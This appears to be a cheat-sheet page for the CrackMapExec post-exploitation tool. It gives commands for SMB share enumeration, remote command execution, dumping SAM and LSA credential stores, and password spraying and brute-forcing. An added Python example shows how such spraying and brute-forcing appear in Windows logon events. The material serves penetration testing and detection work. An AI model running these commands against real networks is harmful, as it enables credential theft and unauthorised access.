
CrackMapExec

Description

CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

Protocols

{smb,ftp,ssh,rdp,ldap,mssql,winrm}
    smb                 own stuff using SMB
    ftp                 own stuff using FTP
    ssh                 own stuff using SSH
    rdp                 own stuff using RDP
    ldap                own stuff using LDAP
    mssql               own stuff using MSSQL
    winrm               own stuff using WINRM

Usage

cme smb 10.10.10.10
cme smb 10.10.10.10 -u 'qu35t' -p 'Passw0rd!' --shares
cme smb 10.10.10.10 -u 'qu35t' -p 'Passw0rd!' --shares -M spider_plus
cme smb 10.10.10.10 --pass-pol
cme smb 10.10.10.10 -u Administrator -p 'Password1!' -x whoami
cme smb 10.10.10.10 -u Administrator -p 'Password1!' --sam
cme smb 10.10.10.10 -u Administrator -p 'Password1!' --lsa

Authentication

cme smb 10.10.10.10 -u '' -p ''
cme smb 10.10.10.10 -u users.txt -p 'Passw0rd!' --continue-on-success
cme smb 10.10.10.10 -u 'qu35t' -p passwords.txt --continue-on-success
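
Detection side of the two list-based commands above, as an added example (not from the original page or the CrackMapExec project): a user list with one password shows up as failed logons for many accounts from one source, and a password list against one user shows up as repeated failures for a single account. The event tuples, thresholds, account names and addresses are constructed assumptions, simplified from Windows Security events 4625 and 4624.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, simplified from Windows Security events:
# (time, source IP, account, event ID); 4625 = failed logon, 4624 = success.
EVENTS = [
    ("2024-01-10T09:00:01", "10.10.10.50", "alice", 4625),
    ("2024-01-10T09:00:02", "10.10.10.50", "bob", 4625),
    ("2024-01-10T09:00:03", "10.10.10.50", "carol", 4624),
    ("2024-01-10T09:00:04", "10.10.10.50", "dave", 4625),
    ("2024-01-10T09:00:05", "10.10.10.50", "erin", 4625),
    ("2024-01-10T09:10:00", "10.10.10.60", "svc_backup", 4625),
    ("2024-01-10T09:10:01", "10.10.10.60", "svc_backup", 4625),
    ("2024-01-10T09:10:02", "10.10.10.60", "svc_backup", 4625),
    ("2024-01-10T09:10:03", "10.10.10.60", "svc_backup", 4625),
    ("2024-01-10T09:20:00", "10.10.10.70", "frank", 4625),
    ("2024-01-10T09:20:30", "10.10.10.70", "frank", 4624),
]

def classify_sources(events, window=timedelta(minutes=5), threshold=4):
    """Label each source IP by the shape of its failed logons inside a sliding window."""
    failures = defaultdict(list)
    for ts, src, user, event_id in events:
        if event_id == 4625:
            failures[src].append((datetime.fromisoformat(ts), user))
    verdicts = {}
    for src, fails in failures.items():
        fails.sort()
        verdict, start = "normal", 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            burst = fails[start:end + 1]
            if len(burst) < threshold:
                continue
            users = {user for _, user in burst}
            if len(users) >= threshold:   # many accounts, few tries each
                verdict = "spray"
                break
            if len(users) == 1:           # one account, many tries
                verdict = "bruteforce"
        verdicts[src] = verdict
    return verdicts

def accounts_to_reset(events, verdicts):
    """Accounts with a successful logon from a flagged source (a guess that worked)."""
    return sorted({user for _, src, user, event_id in events
                   if event_id == 4624 and verdicts.get(src, "normal") != "normal"})
```

Because --continue-on-success keeps the run going after a valid credential is found, the successful logon sits in the middle of the failure burst, which is why accounts_to_reset looks at every success from a flagged source and not only the last event.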
